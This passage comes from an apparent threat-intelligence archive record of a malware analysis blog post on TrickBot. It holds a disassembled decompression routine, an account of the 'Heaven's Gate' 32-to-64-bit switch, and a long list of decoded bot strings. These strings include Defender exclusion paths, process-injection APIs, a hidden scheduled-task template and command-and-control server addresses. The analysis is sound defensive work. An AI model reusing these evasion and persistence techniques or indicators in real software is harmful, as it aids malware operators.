EDX,EAX\r\n01DB3255 8B0A MOV ECX,DWORD PTR DS:[EDX]\r\n01DB3257 890F MOV DWORD PTR DS:[EDI],ECX\r\n01DB3259 01EF ADD EDI,EBP\r\n01DB325B EB 6E JMP SHORT 01DB32CB\r\n01DB325D 3C 40 CMP AL,40\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 9 of 21\n\n01DB325F 72 34 JB SHORT 01DB3295\r\n01DB3261 89C1 MOV ECX,EAX\r\n01DB3263 C1E8 02 SHR EAX,2\r\n01DB3266 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB3269 83E0 07 AND EAX,7\r\n01DB326C 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB326E C1E9 05 SHR ECX,5\r\n01DB3271 8D04D8 LEA EAX,DWORD PTR DS:[EAX+EBX*8]\r\n01DB3274 46 INC ESI\r\n01DB3275 29C2 SUB EDX,EAX\r\n01DB3277 83C1 04 ADD ECX,4\r\n01DB327A 39E8 CMP EAX,EBP\r\n01DB327C 73 35 JNB SHORT 01DB32B3\r\n01DB327E EB 6D JMP SHORT 01DB32ED\r\n01DB3280 05 FF000000 ADD EAX,0FF\r\n01DB3285 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3287 46 INC ESI\r\n01DB3288 08DB OR BL,BL\r\n01DB328A ^74 F4 JE SHORT 01DB3280\r\n01DB328C 8D4C18 24 LEA ECX,DWORD PTR DS:[EAX+EBX+24]\r\n01DB3290 31C0 XOR EAX,EAX\r\n01DB3292 EB 0D JMP SHORT 01DB32A1\r\n01DB3294 90 NOP\r\n01DB3295 3C 20 CMP AL,20\r\n01DB3297 72 74 JB SHORT 01DB330D\r\n01DB3299 83E0 1F AND EAX,1F\r\n01DB329C ^74 E7 JE SHORT 01DB3285\r\n01DB329E 8D48 05 LEA ECX,DWORD PTR DS:[EAX+5]\r\n01DB32A1 66:8B06 MOV AX,WORD PTR DS:[ESI]\r\n01DB32A4 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB32A7 C1E8 02 SHR EAX,2\r\n01DB32AA 83C6 02 ADD ESI,2\r\n01DB32AD 29C2 SUB EDX,EAX\r\n01DB32AF 39E8 CMP EAX,EBP\r\n01DB32B1 72 3A JB SHORT 01DB32ED\r\n01DB32B3 8D440F FD LEA EAX,DWORD PTR DS:[EDI+ECX-3]\r\n01DB32B7 C1E9 02 SHR ECX,2\r\n01DB32BA 8B1A MOV EBX,DWORD PTR DS:[EDX]\r\n01DB32BC 83C2 04 ADD EDX,4\r\n01DB32BF 891F MOV DWORD PTR DS:[EDI],EBX\r\n01DB32C1 83C7 04 ADD EDI,4\r\n01DB32C4 49 DEC ECX\r\n01DB32C5 ^75 F3 JNZ SHORT 01DB32BA\r\n01DB32C7 89C7 MOV EDI,EAX\r\n01DB32C9 31DB XOR EBX,EBX\r\n01DB32CB 8A46 FE MOV AL,BYTE PTR DS:[ESI-2]\r\n01DB32CE 21E8 AND EAX,EBP\r\n01DB32D0 ^0F84 3FFFFFFF JE 01DB3215\r\n01DB32D6 8B16 MOV EDX,DWORD PTR 
DS:[ESI]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 10 of 21\n\n01DB32D8 01C6 ADD ESI,EAX\r\n01DB32DA 8917 MOV DWORD PTR DS:[EDI],EDX\r\n01DB32DC 01C7 ADD EDI,EAX\r\n01DB32DE 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB32E0 46 INC ESI\r\n01DB32E1 ^E9 77FFFFFF JMP 01DB325D\r\n01DB32E6 8DB426 00000000 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB32ED 87D6 XCHG ESI,EDX\r\n01DB32EF 29E9 SUB ECX,EBP\r\n01DB32F1 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[\u003e\r\n01DB32F3 89D6 MOV ESI,EDX\r\n01DB32F5 ^EB D4 JMP SHORT 01DB32CB\r\n01DB32F7 81C1 FF000000 ADD ECX,0FF\r\n01DB32FD 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB32FF 46 INC ESI\r\n01DB3300 08DB OR BL,BL\r\n01DB3302 ^74 F3 JE SHORT 01DB32F7\r\n01DB3304 8D4C0B 0C LEA ECX,DWORD PTR DS:[EBX+ECX+C]\r\n01DB3308 EB 17 JMP SHORT 01DB3321\r\n01DB330A 8D76 00 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB330D 3C 10 CMP AL,10\r\n01DB330F 72 2C JB SHORT 01DB333D\r\n01DB3311 89C1 MOV ECX,EAX\r\n01DB3313 83E0 08 AND EAX,8\r\n01DB3316 C1E0 0D SHL EAX,0D\r\n01DB3319 83E1 07 AND ECX,7\r\n01DB331C ^74 DF JE SHORT 01DB32FD\r\n01DB331E 83C1 05 ADD ECX,5\r\n01DB3321 66:8B06 MOV AX,WORD PTR DS:[ESI]\r\n01DB3324 83C6 02 ADD ESI,2\r\n01DB3327 8D97 00C0FFFF LEA EDX,DWORD PTR DS:[EDI+FFFFC000]\r\n01DB332D C1E8 02 SHR EAX,2\r\n01DB3330 74 2B JE SHORT 01DB335D\r\n01DB3332 29C2 SUB EDX,EAX\r\n01DB3334 ^E9 7AFFFFFF JMP 01DB32B3\r\n01DB3339 8D7426 00 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB333D C1E8 02 SHR EAX,2\r\n01DB3340 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3342 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB3345 8D0498 LEA EAX,DWORD PTR DS:[EAX+EBX*4]\r\n01DB3348 46 INC ESI\r\n01DB3349 29C2 SUB EDX,EAX\r\n01DB334B 8A02 MOV AL,BYTE PTR DS:[EDX]\r\n01DB334D 8807 MOV BYTE PTR DS:[EDI],AL\r\n01DB334F 8A5A 01 MOV BL,BYTE PTR DS:[EDX+1]\r\n01DB3352 885F 01 MOV BYTE PTR DS:[EDI+1],BL\r\n01DB3355 83C7 02 ADD EDI,2\r\n01DB3358 ^E9 6EFFFFFF JMP 01DB32CB\r\n01DB335D 83F9 06 CMP ECX,6\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 11 
of 21\n\n01DB3360 0F95C0 SETNE AL\r\n01DB3363 8B5424 28 MOV EDX,DWORD PTR SS:[ESP+28]\r\n01DB3367 035424 2C ADD EDX,DWORD PTR SS:[ESP+2C]\r\n01DB336B 39D6 CMP ESI,EDX\r\n01DB336D 77 26 JA SHORT 01DB3395\r\n01DB336F 72 1D JB SHORT 01DB338E\r\n01DB3371 2B7C24 30 SUB EDI,DWORD PTR SS:[ESP+30]\r\n01DB3375 8B5424 34 MOV EDX,DWORD PTR SS:[ESP+34]\r\n01DB3379 893A MOV DWORD PTR DS:[EDX],EDI\r\n01DB337B F7D8 NEG EAX\r\n01DB337D 83C4 0C ADD ESP,0C\r\n01DB3380 5A POP EDX\r\n01DB3381 59 POP ECX\r\n01DB3382 5B POP EBX\r\n01DB3383 5E POP ESI\r\n01DB3384 5F POP EDI\r\n01DB3385 5D POP EBP\r\n01DB3386 C3 RETN\r\n01DB3387 B8 01000000 MOV EAX,1\r\n01DB338C ^EB E3 JMP SHORT 01DB3371\r\n01DB338E B8 08000000 MOV EAX,8\r\n01DB3393 ^EB DC JMP SHORT 01DB3371\r\n01DB3395 B8 04000000 MOV EAX,4\r\n01DB339A ^EB D5 JMP SHORT 01DB3371\r\nIf running under WOW64, another, smaller 64-bit EXE is decoded and mapped into memory at 0x100000, and then some hardcoded data is mapped into an executable region of memory which kicks off loading the bot into a new process. Before it gets there, however, it performs a little trick: a far call into 64-bit code, and what happens at that call instruction depends entirely on which debugger you are using. This technique is commonly referred to as ‘Heaven’s Gate’: a far call to 0x33:addr switches execution over to 64-bit mode, which works because we are running under WOW64[3,4]. Note that a 32-bit disassembler misreads the 64-bit code after the far call: the 0x48 bytes it shows as DEC EAX are REX.W prefixes, so 48 83EC 20 is really SUB RSP,20.\r\n00470000 55 PUSH EBP\r\n00470001 89E5 MOV EBP,ESP\r\n00470003 83E4 F0 AND ESP,FFFFFFF0\r\n00470006 9A 11004700 3300 CALL FAR 0033:00470011 ; Far call\r\n0047000D 89EC MOV ESP,EBP\r\n0047000F 5D POP EBP\r\n00470010 C3 RETN\r\n00470011 48 DEC EAX\r\n00470012 83EC 20 SUB ESP,20\r\n00470015 E8 061AB90F CALL 10001A20\r\n0047001A 48 DEC EAX\r\n0047001B 83C4 20 ADD ESP,20\r\n0047001E CB RETF ; Far return\r\nThe decoded bot EXE that gets injected uses the same string encoding as the loader layer did, so this decoded EXE is TrickBot proper. The previous layer is probably TrickLoader, but it has been turned into position-independent bytecode with function obfuscation to hide itself and further protect the bot EXE.\r\nDecoded bot strings:\r\nUnloadUserProfile\r\nLoadUserProfileW\r\nDestroyEnvironmentBlock\r\nCreateEnvironmentBlock\r\nUSERENV.dll\r\nGetAdaptersInfo\r\nIPHLPAPI.dll\r\nNtQueryInformationProcess\r\nntdll.dll\r\nPathFindExtensionW\r\nPathRemoveFileSpecW\r\nPathRemoveBackslashW\r\nStrStrIW\r\nPathRenameExtensionW\r\nPathAddBackslashW\r\nPathFindFileNameW\r\nSHLWAPI.dll\r\nCryptBinaryToStringW\r\nCryptStringToBinaryW\r\nCRYPT32.dll\r\nCoUninitialize\r\nCoCreateInstance\r\nole32.dll\r\nSetSecurityDescriptorDacl\r\nInitializeSecurityDescriptor\r\nCopySid\r\nGetLengthSid\r\nSetEntriesInAclW\r\nGetSecurityInfo\r\nSetSecurityInfo\r\nSetNamedSecurityInfoW\r\nRegSetValueExW\r\nRegOpenKeyExW\r\nRegCloseKey\r\nRegCreateKeyExW\r\nRevertToSelf\r\nAdjustTokenPrivileges\r\nLookupPrivil
egeValueW\r\nCryptGetHashParam\r\nCryptAcquireContextW\r\nCryptSetKeyParam\r\nCryptReleaseContext\r\nConvertStringSecurityDescriptorToSecurityDescriptorW\r\nCryptImportKey\r\nCryptCreateHash\r\nCryptDecrypt\r\nCryptDestroyHash\r\nCryptHashData\r\nCryptDestroyKey\r\nAllocateAndInitializeSid\r\nFreeSid\r\nOpenProcessToken\r\nEqualSid\r\nCreateProcessAsUserW\r\nDuplicateTokenEx\r\nLookupAccountSidW\r\nGetTokenInformation\r\nGetUserNameW\r\nADVAPI32.dll\r\nCreateToolhelp32Snapshot\r\nProcess32NextW\r\nProcess32FirstW\r\nMultiByteToWideChar\r\nWideCharToMultiByte\r\nGetModuleHandleA\r\nQueryPerformanceCounter\r\nGetCurrentThreadId\r\nSetUnhandledExceptionFilter\r\nUnhandledExceptionFilter\r\nlstrlenA\r\nGetCurrentProcessId\r\nGetSystemTimeAsFileTime\r\nGetCurrentProcess\r\nGetVersionExW\r\nGetVersion\r\nSetFilePointer\r\nWriteFile\r\nReadFile\r\nCreateFileW\r\nlstrcmpiW\r\nGetTempFileNameW\r\nCreateProcessW\r\nMoveFileExW\r\nGetTickCount\r\nInitializeCriticalSectionAndSpinCount\r\nSleep\r\nGetFileAttributesW\r\nGetModuleFileNameW\r\nGetStartupInfoW\r\nGetTempPathW\r\nMoveFileW\r\nSetCurrentDirectoryW\r\nDeleteFileW\r\nlstrcpyW\r\nLocalFree\r\nCreateMutexW\r\nResumeThread\r\nWriteProcessMemory\r\nDuplicateHandle\r\nCreateEventW\r\nGetExitCodeThread\r\nVirtualAllocEx\r\nVirtualProtectEx\r\nTerminateProcess\r\nReadProcessMemory\r\nVirtualFreeEx\r\nOpenProcess\r\nCreateRemoteThread\r\nSetEvent\r\nCreateDirectoryW\r\nSetFileAttributesW\r\nlstrcmpA\r\nLoadLibraryA\r\nGetFileTime\r\nFindNextFileW\r\nGetSystemInfo\r\nLockResource\r\nFindClose\r\nGetLastError\r\nlstrcpynW\r\nSetFileTime\r\nGetModuleHandleW\r\nLoadResource\r\nFreeLibrary\r\nFindResourceW\r\nFindFirstFileW\r\nGetFullPathNameW\r\nlstrlenW\r\nlstrcmpW\r\nGetComputerNameW\r\nCreateThread\r\nDEBG\r\nMACHINE\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths\r\nMACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\r\nMACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\r\nWinDefend\r\n%08lX%04lX%lu\r\n 
working\r\npath\r\nlastver\r\nModuleQuery\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 15 of 21\n\nLeaveCriticalSection\r\nEnterCriticalSection\r\nInitializeCriticalSection\r\nVERS\r\nSignatureLength\r\nECCPUBLICBLOB\r\nECDSA_P384\r\nspam.dnsbl.sorbs.net\r\ndnsbl-1.uceprotect.net\r\nb.barracudacentral.org\r\ncbl.abuseat.org\r\nzen.spamhaus.org\r\nGetNativeSystemInfo\r\nModule is not valid\r\nclient_id\r\n1032\r\n/plain/clientip\r\n/text\r\n/raw\r\n/plain\r\nip.anysrc.net\r\nwtfismyip.com\r\nmyexternalip.com\r\nicanhazip.com\r\napi.ipify.org\r\nipinfo.io\r\nipecho.net\r\ncheckip.amazonaws.com\r\nssert\r\nD:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)\r\nGlobal\\Muta\r\n--%s--\r\n--%s\r\nContent-Disposition: form-data; name=\"%S\"\r\nContent-Type: multipart/form-data; boundary=%s\r\nContent-Length: %d\r\n------Boundary%08X\r\nwinsta0\\default\r\nWTSQueryUserToken\r\nWTSGetActiveConsoleSessionId\r\nWTSFreeMemory\r\nWTSEnumerateSessionsA\r\nwtsapi32\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 16 of 21\n\nGetProcAddress\r\nLoadLibraryW\r\nExitProcess\r\nResetEvent\r\nCloseHandle\r\nWaitForSingleObject\r\nSignalObjectAndWait\r\nsvchost.exe\r\nRelease\r\nFreeBuffer\r\nControl\r\nStart\r\nLoad to M failed\r\nRun D failed\r\nLoad to P failed\r\nFind P failed\r\nCreate ZP failed\r\nModule has already been 
loaded\r\nparentfiles\r\nperiod\r\nfile\r\nconf\r\ncontrol\r\nneedinfo\r\nautocontrol\r\nautoconf\r\nprocessname\r\nautostart\r\n\u003cmoduleconfig\u003e*\u003c/moduleconfig\u003e\r\n%s%s\r\n%s%s_configs\\\r\nModules\\\r\nHeapReAlloc\r\nHeapFree\r\nGetProcessHeap\r\nHeapAlloc\r\nkernel32.dll\r\n0.0.0.0\r\nPOST\r\nInternetCanonicalizeUrlW\r\nWininet\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nBCryptVerifySignature\r\nBCryptGetProperty\r\nBCryptImportKeyPair\r\nBCryptOpenAlgorithmProvider\r\nNCryptFreeObject\r\nNCryptDeleteKey\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 17 of 21\n\nNCryptImportKey\r\nNCryptOpenStorageProvider\r\nBcrypt.dll\r\nNcrypt.dll\r\n%s %s SP%d\r\nUnknown\r\nWindows 2000\r\nWindows XP\r\nWindows Server 2003\r\nWindows Vista\r\nWindows Server 2008\r\nWindows 7\r\nWindows Server 2008 R2\r\nWindows 8\r\nWindows Server 2012\r\nWindows 8.1\r\nWindows Server 2012 R2\r\nWindows 10\r\nWindows 10 Server\r\nMozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0\r\npsrv\r\nplugins\r\nexpir\r\nservconf\r\n%s_W%d%d%d.\r\nModule already unloaded\r\nControl failed\r\nModule was unloaded\r\nProcess has been finished\r\nrelease\r\nStart failed\r\nProcess was unloaded\r\nGetParentInfo error\r\nUnable to load module from server\r\nstart\r\nDecode from BASE64 error\r\nWin32 error\r\nInvalid params count\r\nNo params\r\ninfo\r\ndata\r\n%s/%s/64/%s/%s/%s/\r\nnoname\r\n%s/%s/63/%s/%s/%s/%s/\r\n/%s/%s/25/%s/\r\n/%s/%s/23/%d/\r\n/%s/%s/14/%s/%s/0/\r\n/%s/%s/10/%s/%s/%d/\r\n/%s/%s/5/%s/\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 18 of 
21\n\n/%s/%s/1/%s/\r\n/%s/%s/0/%s/%s/%s/%s/%s/\r\nname\r\nmodule\r\nMsNetMonitor\r\n%s.%s.%s.%s\r\n%s.%s\r\n%Y-%m-%dT%H:%M:%S\r\n\u003c/UserId\u003e\r\n\u003cUserId\u003e\r\n\u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n\u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n\u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n\u003cGroupId\u003eNT AUTHORITY\\SYSTEM\u003c/GroupId\u003e\r\n\u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n\u003c/LogonTrigger\u003e\r\n\u003cLogonTrigger\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003c/Command\u003e\r\n\u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n\u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n\u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n\u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n\u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n\u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n\u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n\u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n\u003cIdleSettings\u003e\r\n\u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n\u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n\u003c/IdleSettings\u003e\r\n\u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003cHidden\u003etrue\u003c/Hidden\u003e\r\n\u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n\u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n\u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n\u003cPriority\u003e7\u003c/Priority\u003e\r\n\u003c/Settings\u003e\r\n\u003cActions 
Context=\"Author\"\u003e\r\n\u003c/StartBoundary\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003cScheduleByDay\u003e\r\n\u003cDaysInterval\u003e1\u003c/DaysInterval\u003e\r\n\u003c/ScheduleByDay\u003e\r\n\u003c/CalendarTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cPrincipals\u003e\r\n\u003cPrincipal id=\"Author\"\u003e\r\n\u003cCalendarTrigger\u003e\r\n\u003cRepetition\u003e\r\n\u003cInterval\u003ePT3M\u003c/Interval\u003e\r\n\u003cDuration\u003eP1D\u003c/Duration\u003e\r\n\u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n\u003c/Repetition\u003e\r\n\u003cStartBoundary\u003e\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\"\r\nxmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n\u003cVersion\u003e1.0.1\u003c/Version\u003e\r\n\u003cDescription\u003eSystem service monitor.\u003c/Description\u003e\r\n\u003cURI\u003e\\Task\u003c/URI\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cTriggers\u003e\r\nSYSTEM\r\n%s sTart\r\ngroup_tag\r\nCONFIG\r\nuser\r\nconfig.conf\r\n.tmp\r\n%s %s\r\nSINJ\r\nnot listed\r\nlisted\r\nDNSBL\r\nclient is not behind NAT\r\nclient is behind NAT\r\nfailed\r\nNAT status\r\npublic.bin\r\nConfigsAndKeys\\\r\nDecoding the config out of the bot EXE hasn’t changed.\r\nInitial bot config:\r\n\u003cmcconf\u003e\u003cver\u003e1000158\u003c/ver\u003e\u003cgtag\u003eser0328\u003c/gtag\u003e\u003cservs\u003e\u003csrv\u003e109.95.113.130:449\u003c/srv\u003e\u003csrv\u003e87.101.70.109:449\u003c/srv\u003e\u003csrv\u003e3\r\nReferences:\r\n1. https://labsblog.f-secure.com/2017/12/18/dont-let-an-auto-elevating-bot-spoil-your-christmas/\r\n2. http://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=4869\u0026p=31078\u0026hilit=icedid#p31078\r\n3. http://www.hexacorn.com/blog/2015/10/26/heavens-gate-and-a-chameleon-code-x8664/\r\n4. https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/\r\n5. https://github.com/hfiref0x/UACME/blob/143ead4db6b57a84478c9883023fbe5d64ac277b/Source/Akagi/sup.c#L77\r\nSource: https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html"
	],
	"report_names": [
		"trickbot-uacme.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434000,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.pdf",
		"text": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.txt",
		"img": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.jpg"
	}
}